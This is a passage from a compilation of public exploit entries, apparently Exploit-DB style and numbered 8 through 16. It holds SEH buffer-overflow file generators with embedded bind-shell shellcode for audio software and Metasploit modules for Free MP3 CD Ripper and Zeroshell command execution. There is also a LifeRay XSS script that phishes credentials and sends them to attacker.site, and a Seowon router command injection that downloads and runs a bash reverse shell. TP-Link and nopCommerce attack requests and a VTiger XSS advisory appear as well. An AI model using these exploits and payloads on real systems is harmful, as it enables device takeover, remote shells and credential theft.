$baddata  = "Metal's_Greatest_Hits";                 # you can put whatever you need to here to convince victim (will be seen during crash)
$baddata .= "\x90" x (268 - length($baddata));       # exact overwrite at 272

$nseh = "\xeb\x0b\x90\x90";                          # nseh overwrite: JMP short 11 bytes into NOP sled

# 0x10015962 : pop ecx # pop esi # ret | ascii {PAGE_EXECUTE_READ} [WNASPI32.DLL] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2.0.1.50
# (C:\Program Files\Zortam Mp3 Media Studio\WNASPI32.DLL)
$seh = "\x62\x59\x01\x10";                           # seh overwrite

$nop = "\x90" x 12;                                  # NOP sled

# msfvenom -p windows/shell_bind_tcp LPORT=80 -b "\x00\x0a\x0d" -f perl -v payload EXITFUNC=seh
# Payload size: 355 bytes
$payload =
"\xd9\xcf\xbf\xad\x91\xa4\xe3\xd9\x74\x24\xf4\x5a\x29\xc9" .
"\xb1\x53\x83\xc2\x04\x31\x7a\x13\x03\xd7\x82\x46\x16\xdb" .
"\x4d\x04\xd9\x23\x8e\x69\x53\xc6\xbf\xa9\x07\x83\x90\x19" .
"\x43\xc1\x1c\xd1\x01\xf1\x97\x97\x8d\xf6\x10\x1d\xe8\x39" .
"\xa0\x0e\xc8\x58\x22\x4d\x1d\xba\x1b\x9e\x50\xbb\x5c\xc3" .
"\x99\xe9\x35\x8f\x0c\x1d\x31\xc5\x8c\x96\x09\xcb\x94\x4b" .
"\xd9\xea\xb5\xda\x51\xb5\x15\xdd\xb6\xcd\x1f\xc5\xdb\xe8" .
"\xd6\x7e\x2f\x86\xe8\x56\x61\x67\x46\x97\x4d\x9a\x96\xd0" .
"\x6a\x45\xed\x28\x89\xf8\xf6\xef\xf3\x26\x72\xeb\x54\xac" .
"\x24\xd7\x65\x61\xb2\x9c\x6a\xce\xb0\xfa\x6e\xd1\x15\x71" .
"\x8a\x5a\x98\x55\x1a\x18\xbf\x71\x46\xfa\xde\x20\x22\xad" .
"\xdf\x32\x8d\x12\x7a\x39\x20\x46\xf7\x60\x2d\xab\x3a\x9a" .
"\xad\xa3\x4d\xe9\x9f\x6c\xe6\x65\xac\xe5\x20\x72\xd3\xdf" .
"\x95\xec\x2a\xe0\xe5\x25\xe9\xb4\xb5\x5d\xd8\xb4\x5d\x9d" .
"\xe5\x60\xcb\x95\x40\xdb\xee\x58\x32\x8b\xae\xf2\xdb\xc1" .
"\x20\x2d\xfb\xe9\xea\x46\x94\x17\x15\x68\x35\x91\xf3\x02" .
"\xa5\xf7\xac\xba\x07\x2c\x65\x5d\x77\x06\xdd\xc9\x30\x40" .
"\xda\xf6\xc0\x46\x4c\x60\x4b\x85\x48\x91\x4c\x80\xf8\xc6" .
"\xdb\x5e\x69\xa5\x7a\x5e\xa0\x5d\x1e\xcd\x2f\x9d\x69\xee" .
"\xe7\xca\x3e\xc0\xf1\x9e\xd2\x7b\xa8\xbc\x2e\x1d\x93\x04" .
"\xf5\xde\x1a\x85\x78\x5a\x39\x95\x44\x63\x05\xc1\x18\x32" .
"\xd3\xbf\xde\xec\x95\x69\x89\x43\x7c\xfd\x4c\xa8\xbf\x7b" .
"\x51\xe5\x49\x63\xe0\x50\x0c\x9c\xcd\x34\x98\xe5\x33\xa5" .
"\x67\x3c\xf0\xdb\x96\x8c\xed\x4c\x01\x65\x4c\x11\xb2\x50" .
"\x93\x2c\x31\x50\x6c\xcb\x29\x11\x69\x97\xed\xca\x03\x88" .
"\x9b\xec\xb0\xa9\x89";

$file = "Zortam_Crash.txt";
open (FILE, '>Zortam_Crash.txt');
print FILE $baddata;
print FILE $nseh;
print FILE $seh;
print FILE $nop;
print FILE $payload;
close (FILE);
print "Exploit file created [" . $file . "]\n";
# report the size of everything that was written, not just the filler
print "Buffer size: " . length($baddata . $nseh . $seh . $nop . $payload) . "\n";
  8. ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::FILEFORMAT

  def initialize(info={})
    super(update_info(info,
      'Name'           => "Free MP3 CD Ripper 2.6 < 2.8 (.wma.wav.flac.m3u.acc) Buffer Overflow",
      'Description'    => %q{
        This module exploits a buffer overflow in Free MP3 CD Ripper versions 2.6 and 2.8.
        By constructing a specially crafted WMA WAV M3U ACC FLAC file and attempting to
        convert it to an MP3 file in the application, a buffer is overwritten, which allows
        for running shellcode.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Gionathan Reale', # Exploit-DB POC
          'ZwX'              # Metasploit Module
        ],
      'References'     =>
        [
          [ 'CVE', '2019-9767' ],
          [ 'EDB', '45412' ],
          [ 'URL', 'https://www.exploit-db.com/exploits/45412' ]
        ],
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Windows 7 x86 - Windows 7 x64',
            {
              'Ret' => 0x66e42121 # POP POP RET
            }
          ]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00\x0a\x0d\x2f"
        },
      'Privileged'     => false,
      'DisclosureDate' => "Sep 09 2018",
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('FILENAME', [true, 'Create malicious file example extension (.wma .wav .acc .flac .m3u)', 'name.wma'])
      ])
  end

  def exploit
    file_payload = payload.encoded
    msfsploit = make_fast_nops(4116)
    msfsploit << "\xeb\x06#{Rex::Text.rand_text_alpha(2, payload_badchars)}" # NSEH_JMP
    msfsploit << [target.ret].pack("V*")                                     # SEH
    msfsploit << file_payload
    msfsploit << make_fast_nops(4440)
    file_create(msfsploit)
  end
end
  9. # Exploit Title: Boxoft Convert Master 1.3.0 - 'wav' SEH Local Exploit
# Date: 17.09.2020
# Vendor Homepage: http://www.boxoft.com/
# Software Link: http://www.boxoft.com/convert-master/setup(boxoft-convert-master).exe
# Exploit Author: Achilles
# Tested Version: 1.3.0
# Tested on: Windows 7 x64

# 1.- Run python code :Boxoft_Convert_Master.py
# 2.- Open Boxoft_Convert_Master.exe
# 3.- Click try and Batch Convert Mode
# 4.- Add Evil.wav
# 5.- And you will have a bind shell port 4444
# 6.- Greetings go:XiDreamzzXi,Metatron

#!/usr/bin/env python
import struct

buffer = "\x41" * 4132
nseh = "\xeb\x06\x90\x90"                 # jmp short 6
seh = struct.pack('<L', 0x6d00c683)       # CDRip122.dll
nops = "\x90" * 20

# Bind shellcode port 4444
shellcode = ("\xda\xd5\xb8\x9b\x69\x4d\xa1\xd9\x74\x24\xf4\x5a\x33"
"\xc9\xb1\x60\x83\xc2\x04\x31\x42\x15\x03\x42\x15\x79"
"\x9c\xf2\x9b\x0c\xb0\x35\x05\x03\x97\x32\x91\x2f\x75"
"\x92\x10\x7e\xdf\xd5\xdf\x95\x63\xd0\x24\x96\x1e\xca"
"\xc6\x57\x4b\xd9\xe7\x3c\xe4\x1c\xa0\xd9\x7e\x72\xe4"
"\x38\x26\xd1\x92\x88\x79\x63\x55\xe3\x94\xfe\x9a\xac"
"\xb5\xde\xe4\x35\xbc\xd0\x9f\xe6\x92\x63\x51\x5a\xaf"
"\xad\x1b\xb0\xf9\x6e\x46\xac\x68\xa9\x48\xce\xb8\xe1"
"\xd2\xf5\x1a\x7d\x84\xde\xb9\x55\xa0\xe8\xe3\xd8\xb2"
"\x31\xfb\x1a\x0b\xea\xed\xf4\x8f\xdd\xf5\x55\xbf\x1a"
"\xa5\xe8\xd8\xfa\xde\x45\x11\x7c\x4d\xea\x87\x0f\x9f"
"\xe5\xdf\x90\x18\x7e\x52\x1b\xd7\x24\x22\xab\x1b\xda"
"\x31\xa2\x75\x8f\xa3\x13\x99\x20\x5e\x07\x57\x68\x3e"
"\x10\xc7\xc2\xb0\x2b\xa0\x13\xd6\x6a\x3e\xc3\x1e\x99"
"\x4f\xf0\xce\x63\x50\xe3\x90\x80\x3e\x0e\x9c\x39\x7e"
"\x48\xe6\xf0\xe7\x3b\xd3\x7d\xe3\xa3\x62\x41\xee\x19"
"\xd0\xa8\xc9\xdb\x02\x93\x0f\x34\xb0\xad\x81\x08\x57"
"\xce\xb8\x38\xfe\x13\xc9\xe7\x40\xc2\x17\xa6\x3a\x4c"
"\x06\x31\xfc\x3f\x8f\xcb\x85\x84\x74\x98\x9c\x63\xe5"
"\x46\x2f\xfc\x15\x3b\x5c\x37\xd3\x36\xfc\x39\x3c\x86"
"\x29\x32\xbb\xb3\x04\x13\x6a\xd1\xa7\x55\xac\x8e\xa8"
"\x05\xaf\xc3\xae\x9d\xc6\x5f\xa8\x9d\x8e\x4a\x25\x3a"
"\x35\xa3\xd7\x4c\xaa\xb1\x87\xca\x54\x6d\xdc\xb2\xf3"
"\x3a\xaa\x29\xea\x44\x01\x4e\xb0\x08\x9a\xd0\xb5\x69"
"\x42\xe5\xb4\x5f\x59\xff\xb4\x90\xe2\x97\x66\x09\x89"
"\x87\x8e\xff\xa8\x21\x68\x3f\x01\xe9\xb3\x27\x63\xd2"
"\x93\x2f\x4d\x9c\x28\x21\xd4\x9d\xad\x8f\x24\x19\xc9"
"\x98\xbc\x24\x0b\x47\x84\x9c\x57\xd2\x20\x79\x71\x67"
"\xe0\xd1\xcd\x40\x51\x7d\xe2\x39\xa9\xd2\x92\x4c\x24"
"\x59\x7b\xfd\x89\x6e\xea\xec\xc8\xac\x54\x8a\x26\x60"
"\x81\x38\x06\x32\xab\x56\x1c\xe7\xd0\x78\xe5\xa2\x75"
"\xc8\x28\x1b\xd5\x3f\x51")

payload = buffer + nseh + seh + nops + shellcode

try:
    # binary mode so no byte of the payload is rewritten as a line ending
    f = open("Evil.wav", "wb")
    print "[+] Creating %s bytes evil payload.." % len(payload)
    f.write(payload)
    f.close()
    print "[+] File created!"
except:
    print "File cannot be created"
10.
# Exploit Title: LifeRay 7.2.1 GA2 - Stored XSS
# Date: 10/05/2020
# Exploit Author: 3ndG4me
# Vendor Homepage: https://www.liferay.com/
# Software Link: https://www.liferay.com/
# Version: 7.1.0 -> 7.2.1 GA2 (REQUIRED)
# Tested on: Debian Linux
# CVE : CVE-2020-7934
# Public Exploit/Whitepaper: https://github.com/3ndG4me/liferay-xss-7.2.1GA2-poc-report-CVE-2020-7934
# NOTE: The attached proof of concept is a javascript payload, submitted as a ".txt" file to attach via email as ".js" is often blocked.

// CVE-2020-7934 Cred Phishing Example Attack
// Author: 3ndG4me
// Github: https://github.com/3ndG4me/liferay-xss-7.2.1GA2-poc-report-CVE-2020-7934
// Host this payload with your site and paste in this script tag into a vulnerable field with your URL replaced where relevant:
// <SCRIPT SRC="//attacker.site/cve-2020-7934.js">

var email = prompt("To process this search we need you to confirm your credentials.\n\nPlease confirm your email:", "");
var password = prompt("To process this search we need you to confirm your credentials.\n\nPlease confirm your password:", "");
console.log(email);
console.log(password);
var url = "http://attacker.site/" + email + ":" + password;
$.get(url);
11.
# Exploit Title: Boxoft Audio Converter 2.3.0 - '.wav' Buffer Overflow (SEH)
# Discovery by: Luis Martinez
# Discovery Date: 2020-11-22
# Vendor Homepage: http://www.boxoft.com/
# Software Link: http://www.boxoft.com/audio-converter/a-pdf-bac.exe
# Tested Version: 2.3.0
# Vulnerability Type: Local Buffer Overflow (SEH)
# Tested on OS: Windows 10 Pro (10.0.18362) x64 en

# Steps to Produce the Local Buffer Overflow (SEH):
# 1.- Run python code: Boxotf_Audio_Converter_2.3.0.py
# 2.- Open AudioConvert.exe
# 3.- Try
# 4.- Batch Convert Mode -> Next
# 5.- Add
# 6.- Select Boxotf_Audio_Converter_2.3.0.wav -> Open
# 7.- Port 4444 open

#!/usr/bin/env python
#-*-coding: utf-8-*-

# msfvenom -p windows/shell_bind_tcp -b '\x00\x0A\x0D' -f c
# (the generated shellcode bytes are omitted here)
shellcode = ""

nSEH = "\xeb\x06\x90\x90"
SEH = "\xB8\x68\x40\x00"  # AudioConvert.exe

buffer = "\x41" * 4132 + nSEH + SEH + "\x90" * 16 + shellcode

f = open("Boxotf_Audio_Converter_2.3.0.wav", "wb")  # binary mode so no byte is translated on write
f.write(buffer)
f.close()
12.
# Exploit Title: VTiger v7.0 CRM - 'To' Persistent XSS
# Date: 2020-11-18
# Exploit Author: Vulnerability-Lab
# Vendor Homepage: https://www.vtiger.com/open-source-crm/download-open-source/
# Software Link: https://sourceforge.net/projects/vtigercrm/files/
# Version: v7.0

Document Title:
===============
VTiger v7.0 CRM - (To) Persistent Email Vulnerability

References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2227

Release Date:
=============
2020-11-18

Vulnerability Laboratory ID (VL-ID):
====================================
2227

Common Vulnerability Scoring System:
====================================
4.8

Vulnerability Class:
====================
Cross Site Scripting - Persistent

Current Estimated Price:
========================
1.000€ - 2.000€

Product & Service Introduction:
===============================
Vtiger CRM is a web-application built using PHP. Choose the best CRM for your business. Custom Module & Relationship builder for VTiger is a very useful extension that allows crm administrators to create custom modules within a few clicks. All custom modules are created following strict VTiger standards. In addition, the relationship builder allows the crm admin to link together existing modules as well as new custom modules.

(Copy of the Homepage: https://www.vtiger.com/open-source-crm/download-open-source/ )

Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a persistent cross site vulnerability in the VTiger v7.0 CRM open-source web-application.
Affected Product(s):
====================
VTExperts
Product: VTiger v7.0 - CRM (Web-Application)

Vulnerability Disclosure Timeline:
==================================
2020-04-27: Public Disclosure (Vulnerability Laboratory)
2020-04-28: Researcher Notification & Coordination (Security Researcher)
2020-04-29: Vendor Notification 1 (Security Department)
2020-05-30: Vendor Notification 2 (Security Department)
2020-06-22: Vendor Notification 3 (Security Department)
****-**-**: Vendor Response/Feedback (Security Department)
****-**-**: Vendor Fix/Patch (Service Developer Team)
****-**-**: Security Acknowledgements (Security Department)
2020-11-18: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Medium

Authentication Type:
====================
Restricted Authentication (Guest Privileges)

User Interaction:
=================
Low User Interaction

Disclosure Type:
================
Full Disclosure

Technical Details & Description:
================================
A persistent input validation web vulnerability has been discovered in the official VTiger v7.0 CRM open-source web-application. The vulnerability allows remote attackers to inject their own malicious script code with a persistent attack vector to compromise browser to web-application requests from the application-side.

The persistent cross site scripting web vulnerability is located in the `searchValue` parameter of the `Emails Compose` module. Attackers are able to inject their own malicious script code in the `To` sender input field of the email compose module to attack other user accounts. The email can be delivered to multiple recipients, which allows an attacker to insert the target email and a malicious payload. The request method to inject is GET via searchValue and POST on compose with a persistent attack vector.
Successful exploitation of the vulnerabilities results in session hijacking, persistent phishing attacks, persistent external redirects to malicious sources and persistent manipulation of affected application modules.

Request Method(s):
[+] POST
[+] GET

Vulnerable Module(s):
[+] Email Compose (index.php?module=Emails)

Vulnerable Input(s):
[+] To (Sender - Email)

Proof of Concept (PoC):
=======================
The persistent input validation web vulnerability can be exploited by remote attackers with a low privileged account and with low user interaction. For a security demonstration or to reproduce the cross site web vulnerability, follow the provided information and steps below to continue.

PoC: Url
http://localhost:8080/vtigercrm/index.php?module=Vendors&relatedModule=Emails&view=Detail&record=3883&mode=showRelatedList&relationId=62&tab_label=Emails&app=INVENTORY#

Manual steps to reproduce the vulnerability ...
1. Open the web-application ui
2. Login with a regular user role to the ui
3. Open vendors and move to the compose email form
4. Inject the malicious payload as "to" sender information and as well a valid email to target
5. Send the request after the compose
6. Wait until the administrator or higher privileged targeted users click in the email or receive the email on preview
7. Successful reproduce of the cross site scripting web vulnerability!
PoC: Vulnerable Source (Execution Point)

<div class="col-lg-12"><div class="col-lg-2"><span class="pull-right">To&nbsp;<span class="redColor">*</span></span></div>
<div class="col-lg-6"><div class="select2-container select2-container-multi autoComplete sourceField select2" id="s2id_emailField" style="width: 100%;"><ul class="select2-choices ui-sortable">
<li class="select2-search-choice"> <div>IT <b>(test@test.com)</b></div> <a href="#" class="select2-search-choice-close" tabindex="-1"></a></li>
<li class="select2-search-choice"><div><iframe src"evil.source" onload=alert(document.cookie)></div></iframe></div>

--- PoC Session Logs [GET] ---
http://localhost:8080/vtigercrm/index.php?module=Emails&action=BasicAjax&searchValue=>"<iframe+src%3Da+onload%3Dalert(document.cookie)>&_=1587844428851
Host: localhost:8080
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
Connection: keep-alive
Referer: http://localhost:8080/vtigercrm/index.php?module=Vendors&relatedModule=Emails&view=Detail&record=3883&mode=showRelatedList&relationId=62&tab_label=Emails&app=INVENTORY
Cookie: PHPSESSID=ni2357om9nni5vvhovf20rkt51
-
GET: HTTP/1.1 200 OK
Server: Apache/2.4.10 (Debian)
Content-Length: 28
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/json; charset=UTF-8
-
http://localhost:8080/vtigercrm/evil.source
Host: localhost:8080
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Connection: keep-alive
Referer: http://localhost:8080/vtigercrm/index.php?module=Vendors&relatedModule=Emails&view=Detail&record=3883&mode=showRelatedList&relationId=62&tab_label=Emails&app=INVENTORY
Cookie: PHPSESSID=ni2357om9nni5vvhovf20rkt51
-
GET: HTTP/1.1 200 OK
Server: Apache/2.4.10
Content-Length: 299
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

Reference(s):
http://localhost:8080/vtigercrm/
http://localhost:8080/vtigercrm/index.php
http://localhost:8080/vtigercrm/index.php?module=Emails&action=BasicAjax&searchValue=

Security Risk:
==============
The security risk of the persistent web vulnerability in the web-application is estimated as medium.

Credits & Authors:
==================
Vulnerability-Lab - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Benjamin Kunz Mejri - https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.

Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.

Domains:  www.vulnerability-lab.com  www.vuln-lab.com  www.vulnerability-db.com
Services: magazine.vulnerability-lab.com  paste.vulnerability-db.com  infosec.vulnerability-db.com
Social:   twitter.com/vuln_lab  facebook.com/VulnerabilityLab  youtube.com/user/vulnerability0lab
Feeds:    vulnerability-lab.com/rss/rss.php  vulnerability-lab.com/rss/rss_upcoming.php  vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php  vulnerability-lab.com/register.php  vulnerability-lab.com/list-of-bug-bounty-programs.php

Any modified copy or reproduction, including partial usage, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website are trademarks of the vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material, contact (admin@ or research@) to ask for permission.

Copyright © 2020 | Vulnerability Laboratory - [Evolution Security GmbH]™

--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
13.
# Exploit Title: TP-Link TL-WA855RE V5_200415 - Device Reset Auth Bypass
# Date: 2020/07/29
# Exploit Author: malwrforensics
# Vendor Homepage: https://tp-link.com
# Software link: https://static.tp-link.com/2020/202004/20200430/TL-WA855RE_V5_200415.zip
# Version: TL-WA855RE(US)_V5_200415
# Tested on: N/A
# CVE : CVE-2020-24363

Important: The vendor has released a fix; the new firmware (TL-WA855RE(US)_V5_200731) is available to download from:
https://www.tp-link.com/us/support/download/tl-wa855re/v5/#Firmware

Details

By default the web interface of the TL-WA855RE wireless extender requires users to log in in order to access the admin interface. However, an attacker on the same network can bypass it and use the APIs provided to reset the device to its factory settings by using the TDDP_RESET code. An attacker can then set up a new admin password, resulting in a complete takeover of the device.

To test, you can send a POST request like the one below using the TDDP_RESET (5). The request doesn't need any type of authentication. You can then access the web interface and set a new administrative password.

POST /?code=5&asyn=0 HTTP/1.1
Host: <redacted>
Content-Length: 7
Accept: text/plain, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0
Content-Type: text/plain;charset=UTF-8
Origin: http://<redacted>
Referer: http://<redacted>
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

0|1,0,0
14.
# Exploit Title: nopCommerce Store 4.30 - 'name' Stored Cross-Site Scripting
# Date: 24-11-2020
# Exploit Author: Hemant Patidar (HemantSolo)
# Vendor Homepage: https://www.nopcommerce.com/
# Version: 4.30
# Tested on: Windows 10/Kali Linux
# CVE: CVE-2020-29475

Stored Cross-site scripting (XSS):
Stored XSS, also known as persistent XSS, is the more damaging of the two. It occurs when a malicious script is injected directly into a vulnerable web application.

Attack vector:
This vulnerability allows an attacker to inject the XSS payload in Schedule tasks; each time any user goes to that page of the website, the XSS triggers and the attacker can steal the cookie according to the crafted payload.

Vulnerable Parameters: Schedule tasks.

Steps-To-Reproduce:
1. Go to the nopCommerce Store admin page.
2. Now go to the System-Schedule tasks option.
3. Now click on the edit button on any task.
4. Put the below payload in Schedule tasks:
"hemantsolo"><img src=x onerror=confirm(1)>"
5. Now click on the Update button.
6. The XSS will be triggered.

POST /Admin/ScheduleTask/TaskUpdate HTTP/1.1
Host: 127.0.0.1
Connection: close
Content-Length: 335
Accept: application/json, text/javascript, */*; q=0.01
DNT: 1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: 127.0.0.1
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: 127.0.0.1/Admin/ScheduleTask/List
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,hi;q=0.7,ru;q=0.6
Cookie: xyz

Id=5&Name=hemantsolo%22%3E%3Cimg+src%3Dx+onerror%3Dconfirm(1)%3E&Seconds=3600&Enabled=false&StopOnError=false&__RequestVerificationToken=CfDJ8Hstb5ORl7RLtnBnyhE10fENmFHuOPhDq-cN_XNT5gs_nUq2ht5UeggYY9Fea9OqSCeJnVy_e4IKpQ7HhLYwtOMRS76BYcfJ9Os-CI9BxTxrumbAaunwIxrDMZm6CbNRs9EPzKQabez4H7dNpXG6oVpiC5Pc__xQVm06bp4c4O_D15lqehkk6EmqDAizfm8LFA
15.
# Exploit Title: Seowon 130-SLC router 1.0.11 - 'ipAddr' RCE (Authenticated)
# Date: 5 Aug 2020
# Exploit Author: maj0rmil4d
# Vendor Homepage: http://www.seowonintech.co.kr/en/
# Hardware Link: http://www.seowonintech.co.kr/en/product/detail.asp?num=150&big_kind=B05&middle_kind=B05_29
# Version: 1.0.11 (Possibly all versions)

The default user/pass is admin/admin. Your commands run as the root user. The vulnerability is in the ipAddr parameter of system_log.cgi.

Usage:
login to the dashboard.
setup your listener.
download the revshell.txt with the RCE.
run the revshell.txt.

* here is the RCE request:

POST /cgi-bin/system_log.cgi? HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-type: application/x-www-form-urlencoded
Content-Length: 183
Origin: http://192.168.1.1
Connection: close
Referer: http://192.168.1.1/diagnostic.html?t=201802140812
Cookie: product=cpe; cpe_buildTime=201802140812; vendor=mobinnet; connType=lte; modelCode=SLC_130G; cpe_multiPdnEnable=1; cpe_lang=en; cpe_voip=0; cpe_cwmpc=1; cpe_snmp=1; filesharing=0; cpe_switchEnable=0; cpe_vlanEnable=1; cpe_IPv6Enable=1; cpe_foc=0; cpe_vpn=1; cpe_httpsEnable=0; cpe_internetMTUEnable=0; cpe_sleepMode=0; cpe_wlanEnable=1; cpe_simRestriction=0; cpe_opmode=1; sessionTime=1596644084662; cpe_login=admin; _lang

Command=Diagnostic&traceMode=trace&reportIpOnly=0&pingPktSize=56&pingTimeout=30&pingCount=4&ipAddr=;id&maxTTLCnt=30&queriesCnt=3&reportIpOnlyCheckbox=on&btnApply=Apply&T=1596644096617

* to get a reverse shell, setup the listener and download the file on the router, then run it.

* the content of the revshell.txt:

bash -i >& /dev/tcp/192.168.1.10/45214 0>&1

* to download:

POST /cgi-bin/system_log.cgi? HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-type: application/x-www-form-urlencoded
Content-Length: 183
Origin: http://192.168.1.1
Connection: close
Referer: http://192.168.1.1/diagnostic.html?t=201802140812
Cookie: product=cpe; cpe_buildTime=201802140812; vendor=mobinnet; connType=lte; modelCode=SLC_130G; cpe_multiPdnEnable=1; cpe_lang=en; cpe_voip=0; cpe_cwmpc=1; cpe_snmp=1; filesharing=0; cpe_switchEnable=0; cpe_vlanEnable=1; cpe_IPv6Enable=1; cpe_foc=0; cpe_vpn=1; cpe_httpsEnable=0; cpe_internetMTUEnable=0; cpe_sleepMode=0; cpe_wlanEnable=1; cpe_simRestriction=0; cpe_opmode=1; sessionTime=1596644084662; cpe_login=admin; _lang

Command=Diagnostic&traceMode=trace&reportIpOnly=0&pingPktSize=56&pingTimeout=30&pingCount=4&ipAddr=;wget http://192.168.1.10/revshell.txt&maxTTLCnt=30&queriesCnt=3&reportIpOnlyCheckbox=on&btnApply=Apply&T=1596644096617

* to run it:

POST /cgi-bin/system_log.cgi? HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-type: application/x-www-form-urlencoded
Content-Length: 183
Origin: http://192.168.1.1
Connection: close
Referer: http://192.168.1.1/diagnostic.html?t=201802140812
Cookie: product=cpe; cpe_buildTime=201802140812; vendor=mobinnet; connType=lte; modelCode=SLC_130G; cpe_multiPdnEnable=1; cpe_lang=en; cpe_voip=0; cpe_cwmpc=1; cpe_snmp=1; filesharing=0; cpe_switchEnable=0; cpe_vlanEnable=1; cpe_IPv6Enable=1; cpe_foc=0; cpe_vpn=1; cpe_httpsEnable=0; cpe_internetMTUEnable=0; cpe_sleepMode=0; cpe_wlanEnable=1; cpe_simRestriction=0; cpe_opmode=1; sessionTime=1596644084662; cpe_login=admin; _lang

Command=Diagnostic&traceMode=trace&reportIpOnly=0&pingPktSize=56&pingTimeout=30&pingCount=4&ipAddr=;bash revshell.txt&maxTTLCnt=30&queriesCnt=3&reportIpOnlyCheckbox=on&btnApply=Apply&T=1596644096617
16.
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Zeroshell 3.9.0 Remote Command Execution',
      'Description'    => %q{
        This module exploits an unauthenticated command injection vulnerability found in
        ZeroShell 3.9.0 in the "/cgi-bin/kerbynet" url. As sudo is configured to execute
        /bin/tar without a password (NOPASSWD) it is possible to run root commands using
        the "checkpoint" tar options.
      },
      'Author'         =>
        [
          'Juan Manuel Fernandez', # Vulnerability discovery
          'Giuseppe Fuggiano <giuseppe[dot]fuggiano[at]gmail.com>', # Metasploit module
        ],
      'References'     =>
        [
          ['CVE', '2019-12725'],
          ['URL', 'https://www.tarlogic.com/advisories/zeroshell-rce-root.txt'],
          ['URL', 'https://github.com/X-C3LL/PoC-CVEs/blob/master/CVE-2019-12725/ZeroShell-RCE-EoP.py']
        ],
      'DisclosureDate' => 'Jul 17 2019',
      'License'        => MSF_LICENSE,
      'Privileged'     => true,
      'Platform'       => [ 'unix', 'linux' ],
      'Arch'           => [ ARCH_X86 ],
      'Targets'        =>
        [
          ['Zeroshell 3.9.0 (x86)',
            {
              'Platform' => 'linux',
              'Arch' => ARCH_X86,
            }
          ],
        ],
      'DefaultTarget'  => 0,
    ))

    register_options(
      [
        Opt::RPORT(443),
        OptBool.new('SSL', [true, 'Use SSL', true]),
      ])
  end

  def execute_command(cmd, opts = {})
    command_payload = "%27%0A%2Fetc%2Fsudo+tar+-cf+%2Fdev%2Fnull+%2Fdev%2Fnull+--checkpoint%3d1+--checkpoint-action%3dexec%3d%22#{filter_bad_chars(cmd)}%22%0A%27"
    print_status("Sending stager payload...")
    res = send_request_cgi(
      'method'        => 'GET',
      'uri'           => '/cgi-bin/kerbynet',
      'encode_params' => false,
      'vars_get'      => {
        'Action'   => 'x509view',
        'Section'  => 'NoAuthREQ',
        'User'     => '',
        'x509type' => command_payload
      }
    )
    return res
  end

  def filter_bad_chars(cmd)
    cmd.gsub!(/chmod \+x/, 'chmod 777')
    cmd.gsub!(/;/, " %0A ")
    cmd.gsub!(/ /, '+')
    cmd.gsub!(/\//, '%2F')
    return cmd
  end

  def check
    res = execute_command('id')
    if res && res.body.include?("uid=0(root)")
      Exploit::CheckCode::Appears
    else
      Exploit::CheckCode::Safe
    end
  end

  def exploit
    print_status("Exploiting...")
    execute_cmdstager(flavor: :wget, delay: 5)
  end
end
